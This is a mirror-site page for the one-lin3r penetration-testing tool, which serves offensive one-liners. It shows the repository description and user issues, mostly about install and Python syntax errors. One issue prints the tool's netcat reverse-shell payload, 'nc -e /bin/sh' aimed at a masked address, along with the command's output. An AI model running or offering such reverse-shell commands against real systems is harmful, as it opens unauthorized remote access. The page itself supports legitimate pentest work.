Giter Site home page Giter Site logo

d4vinci / one-lin3r Goto Github PK

View Code? Open in Web Editor NEW
1.6K 68.0 291.0 2.21 MB

Gives you one-liners that aids in penetration testing operations, privilege escalation and more

Home Page: https://pypi.org/project/one-lin3r/

License: GNU General Public License v3.0

Python 100.00%
hacking hacking-tool web-delivery metasploit one-liners one-liner pentest-tool pentesting-windows penetration-testing web-based-attacks

one-lin3r's Introduction

Hi there!


I am a developer, web designer, hacker-wannabe, and a lot of things in between. You can define me as a computer sciences enthusiast. I love to see how things work in depth, make things, break things and make things that break things.😄

In my spare time, I enjoy gaming, cinematography, and reading novels.

one-lin3r's People

Contributors

d4vinci avatar mryeniay avatar naliferopoulos avatar pykler avatar vesche avatar zonksec avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

one-lin3r's Issues

Can't load lines

Hello. I installed the one-lin3r through python -m pip install on windows 10. I run from here "C: \ py372 \ Scripts ". The error on the screenshot. Apparently the program can not find a directory with resources. I tried to copy it to the same directory from which I launch one-lin3r, but the error remains.
изображение

error launching One-Lin3r

Installation method:

pip install one-lin3r
one-lin3r -h

$:/usr/local/bin# ./one-lin3r -h

Traceback (most recent call last):
File "./one-lin3r", line 5, in
from one_lin3r.main import main
File "/usr/local/lib/python2.7/dist-packages/one_lin3r/main.py", line 3, in
from .core import Cli
File "/usr/local/lib/python2.7/dist-packages/one_lin3r/core/Cli.py", line 143
print(Search_parser.format_help(), end="")
^
SyntaxError: invalid syntax

Problem running on Windows 7 (Python 2.7)


$ python One_Lin3r.py -h
Traceback (most recent call last):
File "One_Lin3r.py", line 3, in
from Core import Cli
File "E:\Python27\One-Lin3r-master\Core\Cli.py", line 5, in
from . import utils,db
File "E:\Python27\One-Lin3r-master\Core\utils.py", line 81
print(s, end='')
^
SyntaxError: invalid syntax


Installed as described on your Installation Notes: any fix?

Thank you :)

Problem at install

Hello, i have the new kali linux version which offers windows style.

when i install with pip or git clone it i cannot start even i have the requirements.
It says:

"root@ORBIT:~# one-lin3r
Traceback (most recent call last):
File "/usr/local/bin/one-lin3r", line 6, in
from one_lin3r.main import main
File "/usr/local/lib/python2.7/dist-packages/one_lin3r/main.py", line 3, in
from .core import Cli
File "/usr/local/lib/python2.7/dist-packages/one_lin3r/core/Cli.py", line 6, in
from . import utils,db
File "/usr/local/lib/python2.7/dist-packages/one_lin3r/core/utils.py", line 5, in
from prompt_toolkit.shortcuts import CompleteStyle, prompt
ImportError: cannot import name CompleteStyle"

How i can solve this. Really nice program by the way. :)

windows/ruby/tcpsocket_reverse oneliner doesn't work

OneLiner > use windows/ruby/tcpsocket_reverse
[+] This liner added by Karim shoair (D4Vinci)
[+] Loading payload windows/ruby/tcpsocket_reverse...
OneLiner Payload(tcpsocket_reverse)[IP & port as (ip:port)] > 1.1.1.1:4444
[!] use is not recognized as an internal command !
[+] Maybe you meant : use	
[+] Type help or ? to learn more..

ImportError: cannot import name 'CompleteStyle'

pip3 install One-Lin3r; success
But running the program display:
Traceback (most recent call last):
File "/usr/local/bin/one-lin3r", line 7, in
from one_lin3r.main import main
File "/usr/local/lib/python3.6/dist-packages/one_lin3r/main.py", line 3, in
from .core import Cli
File "/usr/local/lib/python3.6/dist-packages/one_lin3r/core/Cli.py", line 6, in
from . import utils,db
File "/usr/local/lib/python3.6/dist-packages/one_lin3r/core/utils.py", line 5, in
from prompt_toolkit.shortcuts import CompleteStyle, prompt
ImportError: cannot import name 'CompleteStyle'

How come...

When I install using pip, it detects WIRUS, but when I manually install it detects no WIRUS? Why I outta...

Sometime it would echo payload not found!

I use command list it would echo the payload,but when I use info or use command it would echo payload not found!this issue occured when I using the tools some minutes ago。while,i reboot the computer,it missing,and after some minutes,it began。

Invalid option 'e'

Using:

OneLiner > use linux/bash/netcat_reverse
[+] This liner added by Karim shoair (D4Vinci)
[+] Loading payload linux/bash/netcat_reverse...
OneLiner Payload(netcat_reverse)[IP & port as (ip:port)] > *****

+Final payload -> nc -e /bin/sh ******

OneLiner > 

I get the following:

~$ nc -e /bin/sh *******
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-O length]
	  [-P proxy_username] [-p source_port] [-q seconds] [-s source]
	  [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
	  [-x proxy_address[:port]] [destination] [port]
~$ 

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.